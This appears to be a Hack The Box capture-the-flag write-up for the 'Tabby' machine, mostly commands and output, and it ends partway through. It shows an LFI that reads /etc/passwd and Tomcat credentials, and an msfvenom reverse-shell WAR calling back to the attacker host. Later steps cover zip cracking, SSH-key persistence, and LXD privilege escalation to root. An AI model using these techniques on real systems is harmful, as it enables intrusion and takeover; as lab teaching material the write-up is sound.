Tabby
Contents
Port scan
u505@naos:~/HTB/Machines/Tabby$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.194
Starting masscan 1.0.5 at 2021-01-07 23:26:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.194 Discovered open port 8080/tcp on 10.10.10.194 Discovered open port 22/tcp on 10.10.10.194
u505@naos:~/HTB/Machines/Tabby$ nmap -sC -sV tabby Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 18:26 EST Nmap scan report for tabby (10.10.10.194) Host is up (0.036s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA) | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA) |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
Web enumeration (port 80)
There is a link to news.php and the argument is file=statement
Dirsearch
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,js" -f -t 100 -u http://megahosting.htb
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 23053
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-39-23.log
Target: http://megahosting.htb/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/_21-01-07_18-39-23.txt
[18:39:23] Starting: [18:39:23] 403 - 280B - /.hta.php [18:39:27] 403 - 280B - /.hta/ [18:39:29] 403 - 280B - /.htaccess.php [18:39:32] 403 - 280B - /.htpasswd.js [18:39:33] 403 - 280B - /.hta.js [18:39:33] 301 - 319B - /assets -> http://megahosting.htb/assets/ [18:39:33] 403 - 280B - /assets/ [18:39:36] 403 - 280B - /.hta.txt [18:39:37] 403 - 280B - /.htaccess.js [18:39:37] 403 - 280B - /.htpasswd.txt [18:39:37] 403 - 280B - /.htpasswd.php [18:39:49] 200 - 766B - /favicon.ico [18:39:49] 301 - 318B - /files -> http://megahosting.htb/files/ [18:39:49] 403 - 280B - /files/ [18:39:53] 403 - 280B - /icons/ [18:39:53] 200 - 14KB - /index.php [18:39:53] 200 - 14KB - /index.php/ [18:40:00] 200 - 0B - /news.php [18:40:08] 200 - 2KB - /Readme.txt [18:40:11] 403 - 280B - /server-status/ [18:40:11] 403 - 280B - /server-status
Task Completed
There is a folder named files. And the news.php found previously.
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,js" -f -t 100 -u http://megahosting.htb/files
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 23053
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-41-28.log
Target: http://megahosting.htb/files/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/files_21-01-07_18-41-28.txt
[18:41:28] Starting: [18:41:31] 403 - 280B - /files/.hta.php [18:41:31] 403 - 280B - /files/.htaccess.js [18:41:32] 403 - 280B - /files/.htpasswd.js [18:41:32] 403 - 280B - /files/.hta/ [18:41:32] 403 - 280B - /files/.hta.js [18:41:32] 403 - 280B - /files/.hta.txt [18:41:32] 403 - 280B - /files/.htaccess.php [18:41:32] 403 - 280B - /files/.htpasswd.txt [18:41:32] 403 - 280B - /files/.htpasswd.php [18:41:36] 301 - 326B - /files/archive -> http://megahosting.htb/files/archive/ [18:41:36] 403 - 280B - /files/archive/ [18:42:19] 200 - 6KB - /files/statement
Task Completed
The file statement is in the folder files.
LFI
We can access the file statement.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/files/statement 2>/dev/null | head -n 10
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Mega Hosting</title>
<meta name="description" content="">
The script news doesn't return anything if it is invoked alone.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php
The script returns the content of the file named statement in the folder files when the argument file with filename is passed on the URL.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=statement 2>/dev/null | head -n 10
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Mega Hosting</title>
<meta name="description" content="">
Passing the filename ../../../../etc/passwd discloses an local file inclusion vulnerability on the script news.php
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false ash:x:1000:1000:clive:/home/ash:/bin/bash
Tomcat enumeration (port 8080)
The tomcat installation seems to be the default installation with managing tools documentation and examples.
The documentation provides the exact version of tomcat 9.0.31.
Dirsearch
The enumeration does not provide additional information, only expected default applications (folders) are found.
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,jsp" -f -t 100 -u http://megahosting.htb:8080/
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, jsp | HTTP method: GET | Threads: 100 | Wordlist size: 18447
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-48-40.log
Target: http://megahosting.htb:8080/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/_21-01-07_18-48-40.txt
[18:48:40] Starting: [18:48:46] 302 - 0B - /docs -> /docs/ [18:48:46] 200 - 17KB - /docs/ [18:48:48] 302 - 0B - /examples -> /examples/ [18:48:48] 200 - 1KB - /examples/ [18:48:54] 302 - 0B - /host-manager -> /host-manager/ [18:48:55] 302 - 0B - /host-manager/ -> /host-manager/html [18:48:56] 200 - 2KB - /index.html [18:49:00] 302 - 0B - /manager -> /manager/ [18:49:00] 302 - 0B - /manager/ -> /manager/html
Task Completed
tomcat-user.txt
The LFI provides access to local files. The goal is to access the tomcat-user.xml file to access the management console.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../var/lib/tomcat9/webapps/ROOT/index.html 2> /dev/null | head
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat</title>
</head>
<br>
<body>
<h1>It works !</h1>
The index.html was find where I expected.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../usr/share/doc/tomcat9-common/RUNNING.txt.gz 2>/dev/null | gzip -d | head ================================================================================ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
The RUNNING.txt file too. But the tomcat-user.xml file was not found on the default location. Nmap detected that the OS is Ubuntu. I installed locally tomcat on the Kali box to search the default debian location of the file.
u505@naos:/etc/apache2/sites-enabled$ sudo apt install tomcat9
u505@naos:/etc/apache2/sites-enabled$ find / -name tomcat-users.xml 2>/dev/null
/usr/share/tomcat9/etc/tomcat-users.xml
And the file is in the expected Debain location.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml <?xml version="1.0" encoding="UTF-8"?> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <role rolename="admin-gui"/> <role rolename="manager-script"/> <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/> </tomcat-users>
Reverse shell from Tomcat
Access Tomcat admin panel
We access the host manager.
But the manager panel is not accessible.
tomcatWarDeployer.py
At first I tried to use mgeeky's tomcatWarDeployer script (As we did in Jerry). But It failed, because we do not have the admin-gui role. It is the reason why the manager panel is not accessible.
u505@naos:~/HTB/Machines/Tabby$ python /opt/utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.194:8080 -U tomcat -P '$3cureP4s5w0rd123!' -H 10.10.14.12 -p 4444 -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.12:4444. DEBUG: Trying Creds: ["tomcat:$3cureP4s5w0rd123!"]: Browsing to "http://10.10.10.194:8080/manager/html"... DEBUG: Trying to fetch: "http://10.10.10.194:8080/manager/html/" WARNING: Invalid credentials supplied for Apache Tomcat. ERROR: Service not found or could not authenticate to it.
Script war deployment
With the manager-script role, we should be able to deploy the war.
From tomcat documentation.
Deploy A New Application Archive (WAR) Remotely http://localhost:8080/manager/text/deploy?path=/foo Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.
This command is executed by an HTTP PUT request.
The .WAR file may include Tomcat specific deployment configuration, by including a Context configuration XML file in /META-INF/context.xml.
URL parameters include:
update: When set to true, any existing update will be undeployed first. The default value is set to false. tag: Specifying a tag name, this allows associating the deployed webapp with a tag or label. If the web application is undeployed, it can be later redeployed when needed using only the tag. config : URL of a Context configuration ".xml" file in the format file:/absolute/path/to/a/context.xml. This must be the absolute path of a web application Context configuration ".xml" file which contains the Context configuration element. NOTE - This command is the logical opposite of the /undeploy command.
If installation and startup is successful, you will receive a response like this:
OK - Deployed application at context path /foo Otherwise, the response will start with FAIL and include an error message. Possible causes for problems include:
Application already exists at path /foo The context paths for all currently running web applications must be unique. Therefore, you must undeploy the existing web application using this context path, or choose a different context path for the new one. The update parameter may be specified as a parameter on the URL, with a value of true to avoid this error. In that case, an undeploy will be performed on an existing application before performing the deployment.
Encountered exception An exception was encountered trying to start the new web application. Check the Tomcat logs for the details, but likely explanations include problems parsing your /WEB-INF/web.xml file, or missing classes encountered when initializing application event listeners and filters.
Creation of war reverse shell.
u505@naos:~/HTB/Machines/Tabby$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.12 lport=4444 -f Payload size: 13397 bytes Final size of war file: 13397 bytes Saved as: u505.war
Raise our listener.
u505@naos:~/HTB/Machines/Tabby/tomcat/apache-tomcat-9.0.31/conf$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Deploy our war application.
u505@naos:~/HTB/Machines/Tabby$ curl -u tomcat --upload-file u505.war http://tabby:8080/manager/text/deploy?path=/u505
Enter host password for user 'tomcat':
OK - Deployed application at context path [/u505]
Call our application.
u505@naos:~/HTB/Machines/Tabby$ curl http://tabby:8080/u505/
The reverse shell opens.
u505@naos:~/HTB/Machines/Tabby/tomcat/apache-tomcat-9.0.31/conf$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.194. Ncat: Connection from 10.10.10.194:48830. whoami tomcat python -c 'import pty; pty.spawn("/bin/bash")' /bin/sh: 2: python: not found python3 -c 'import pty; pty.spawn("/bin/bash")' tomcat@tabby:/var/lib/tomcat9$
Pivot to user ash
After long enumeration, a file seemed interesting.
tomcat@tabby:/var/www/html/files$ ls -ltr
total 28
-rw-r--r-- 1 root root 6507 Jun 16 2020 statement
-rw-r--r-- 1 ash ash 8716 Jun 16 2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Jun 16 2020 revoked_certs
drwxr-xr-x 2 root root 4096 Jun 16 2020 archive
We download it.
u505@naos:~/HTB/Machines/Tabby$ wget -q http://tabby/files/16162020_backup.zip
Crack zip password
The zip file was encrypted.
u505@naos:~/HTB/Machines/Tabby$ zip2john 16162020_backup.zip > zip.hash 16162020_backup.zip/var/www/html/assets/ is not encrypted! ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2 ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6 ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3 NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time
u505@naos:~/HTB/Machines/Tabby$ cat zip.hash 16162020_backup.zip:$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
u505@naos:~/HTB/Machines/Tabby$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status admin@it (16162020_backup.zip) 1g 0:00:00:00 DONE (2021-01-07 20:25) 1.265g/s 13127Kp/s 13127Kc/s 13127KC/s adnbrie..adambossmaster Use the "--show" option to display all of the cracked passwords reliably Session completed
u505@naos:~/HTB/Machines/Tabby$ john zip.hash --show 16162020_backup.zip:admin@it::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
1 password hash cracked, 0 left
The information inside is a backup of the web site, it does not provide new information.
Pivot as ash user
The file was owned by the user ash.
tomcat@tabby:/var$ su - ash
su - ash
Password: admin@it
ash@tabby:~$ whoami
ash
User flag
Ssh key pair generation
u505@naos:~/HTB/Machines/Tabby$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505 Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in u505 Your public key has been saved in u505.pub The key fingerprint is: SHA256:E4RYiznNKPC5h6MHD2QfgzlTn4aeAblWIJHVEe53jO0 u505@naos The key's randomart image is: +---[RSA 3072]----+ |+*+oo=... | |o+=+=*oo | | B*=*++ . | |oo==*. + . | |+ ++o o S | | = o . o . | |. o E | | . | | | +----[SHA256]-----+
Add public key to ash user.
ash@tabby:~$ mkdir .ssh mkdir .ssh ash@tabby:~/.ssh$ cd .ssh cd .ssh ash@tabby:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzD5s0m0O3c3au6Xs9P+HS7AxrYShHdJgdW64KoR09KbPdxfQLjwSkg7xv/m2c++FrEvL036xVY7MS/2kk+EtCrRH+BapfqQZUeLz7KsiXGmvI6cRs4dkMjPPGFsqXsiEQ7vCAA+1pXV/WgQO62FANn2bqUQq9NBa85FdGOSLdbk7siCi7KzcCnHl4sWDtmP9707S0NKyAAGcGEyukOAcGmbocl+9wxkVMxfY/50IHnQKTNrbmg0biWJEd8IPiLoRVHlI8ZRh76ggbOjuh9rnQOG7aIMq7LxEEjfTZmXuXgwObqYtWRzRh6u0OIBedKwEHXJvxNtZaUqb9csdK/vyGrylwF+oUmoL/2VHlUofDip7JK/Nzqk9J1LEzAU22hywRJ95fA36q9KNEDm6xtsrCJczMZb/bZkcEnkqLR5UgsJPKusSGf/3fZIeIGhWNsWxuUJfB9NBWkWpqaCbjkVP+9zcfLB1MOA8EFKS5JlUJiJ0Za/7KqC/LMBbAIpDdBW8= u505@naos' >> authorized_keys <0Za/7KqC/LMBbAIpDdBW8= u505@naos' >> authorized_keys ash@tabby:~/.ssh$ chmod 600 authorized_keys chmod 600 authorized_keys
Ssh as ash
u505@naos:~/HTB/Machines/Tabby$ ssh -i u505 ash@tabby Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Fri 08 Jan 2021 01:59:15 AM UTC
System load: 0.0 Processes: 156 Usage of /: 34.1% of 15.68GB Users logged in: 0 Memory usage: 36% IPv4 address for ens192: 10.10.10.194 Swap usage: 0%
0 updates can be installed immediately. 0 of these updates are security updates.
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Tue May 19 11:48:00 2020
ash@tabby:~$ cat user.txt <USER_FLAG>
Privileges escalation
First reflex, no luck :(
ash@tabby:~$ sudo -l [sudo] password for ash: Sorry, user ash may not run sudo on tabby. u505@naos:~/HTB/Machines/Tabby/web$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Download Enum tools
ash@tabby:~$ wget -q http://10.10.14.12/pspy64 ash@tabby:~$ wget -q http://10.10.14.12/LinEnum.sh ash@tabby:~$ chmod +x LinEnum.sh pspy64
Execution of LinEnum.sh
ash@tabby:~$ ./LinEnum.sh -t
######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 ... [+] We're a member of the (lxd) group - could possibly misuse these rights! uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
### SCAN COMPLETE ####################################
Ash is member of the lxd group. That means that we can create a container with access to the local files as root (As we alternatively did in Apocalyst).
Create the privilege escalation image
First we create the image.
u505@naos:~/HTB/Machines/Tabby$ wget -q https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine u505@naos:~/HTB/Machines/Tabby$ chmod +x build-alpine u505@naos:~/HTB/Machines/Tabby$ sudo ./build-alpine [sudo] password for u505: Determining the latest release... v3.12 Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64 Downloading alpine-mirrors-3.5.10-r0.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' Downloading alpine-keys-2.2-r0.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' Downloading apk-tools-static-2.10.5-r1.apk tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1' alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK Verified OK Selecting mirror http://ftp.halifax.rwth-aachen.de/alpine/v3.12/main fetch http://ftp.halifax.rwth-aachen.de/alpine/v3.12/main/x86_64/APKINDEX.tar.gz (1/19) Installing musl (1.1.24-r10) (2/19) Installing busybox (1.31.1-r19) Executing busybox-1.31.1-r19.post-install (3/19) Installing alpine-baselayout (3.2.0-r7) Executing alpine-baselayout-3.2.0-r7.pre-install Executing alpine-baselayout-3.2.0-r7.post-install (4/19) Installing openrc (0.42.1-r11) Executing openrc-0.42.1-r11.post-install (5/19) Installing alpine-conf (3.9.0-r1) (6/19) Installing libcrypto1.1 (1.1.1i-r0) (7/19) Installing libssl1.1 (1.1.1i-r0) (8/19) Installing ca-certificates-bundle (20191127-r4) (9/19) Installing libtls-standalone (2.9.1-r1) (10/19) Installing ssl_client (1.31.1-r19) (11/19) Installing zlib (1.2.11-r3) (12/19) Installing apk-tools (2.10.5-r1) (13/19) Installing busybox-suid (1.31.1-r19) (14/19) Installing busybox-initscripts (3.2-r2) Executing busybox-initscripts-3.2-r2.post-install (15/19) Installing scanelf (1.2.6-r0) (16/19) Installing musl-utils (1.1.24-r10) (17/19) Installing libc-utils (0.7.2-r3) (18/19) Installing alpine-keys (2.2-r0) (19/19) Installing alpine-base (3.12.3-r0) Executing busybox-1.31.1-r19.trigger OK: 8 MiB in 19 packages
With the image created, we upload it to the target server.
u505@naos:~/HTB/Machines/Tabby$ mv alpine-v3.12-x86_64-20210108_0403.tar.gz web/
Download it from the target server
ash@tabby:~$ wget -q http://10.10.14.12/alpine-v3.12-x86_64-20210108_0403.tar.gz
First we need to initialize the container system. The storage backend is set as the host file system.
Run privilege escalation container
ash@tabby:~$ lxd init 2021/01/08 10:07:30 usbid: failed to load: open /usr/share/misc/usb.ids: no such file or directory Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: Would you like LXD to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes] Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
The image is imported.
ash@tabby:~$ lxc image import alpine-v3.12-x86_64-20210108_0403.tar.gz --alias alpine Image imported with fingerprint: d82031be94ba1f4830d2742be85eec32b13506f8346ca43d0502cef26562b214 ash@tabby:~$ lxc image list +--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE | +--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | alpine | d82031be94ba | no | alpine v3.12 (20210108_04:03) | x86_64 | CONTAINER | 3.02MB | Jan 8, 2021 at 9:27am (UTC) | +--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+
Allow our image as privileged.
ash@tabby:~$ lxc init alpine privesc -c security.privileged=true Creating privesc
Configure a mount of the root file inside the container.
ash@tabby:~$ lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true Device giveMeRoot added to privesc
Start container
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc list
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
| privesc | RUNNING | 10.200.98.3 (eth0) | fd42:637d:ff1d:836d:216:3eff:fe6a:a11d (eth0) | CONTAINER | 0 |
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
Access a shell inside the container. We are root in the container (not the host machine).
ash@tabby:~$ lxc exec privesc /bin/sh ~ # id uid=0(root) gid=0(root)
Inside the container the host root file system is mount in /mnt/root/
~ # df -h Filesystem Size Used Available Use% Mounted on /dev/sda2 15.7G 5.4G 9.5G 36% / none 492.0K 4.0K 488.0K 1% /dev udev 951.2M 0 951.2M 0% /dev/fuse udev 951.2M 0 951.2M 0% /dev/net/tun tmpfs 100.0K 0 100.0K 0% /dev/lxd /dev/sda2 15.7G 5.4G 9.5G 36% /mnt/root tmpfs 198.8M 1.1M 197.6M 1% /mnt/root/run tmpfs 5.0M 0 5.0M 0% /mnt/root/run/lock tmpfs 198.8M 1.1M 197.6M 1% /mnt/root/run/snapd/ns tmpfs 198.8M 0 198.8M 0% /mnt/root/run/user/1000 /dev/loop0 55.0M 55.0M 0 100% /mnt/root/snap/core18/1705 /dev/loop1 27.1M 27.1M 0 100% /mnt/root/snap/snapd/7264 /dev/loop2 69.0M 69.0M 0 100% /mnt/root/snap/lxd/14804 tmpfs 1.0M 0 1.0M 0% /mnt/root/var/snap/lxd/common/ns udev 951.2M 0 951.2M 0% /mnt/root/dev tmpfs 100.0K 0 100.0K 0% /dev/.lxd-mounts none 492.0K 4.0K 488.0K 1% /proc/sys/kernel/random/boot_id tmpfs 198.8M 36.0K 198.7M 0% /run
We add our ssh public key to the user root.
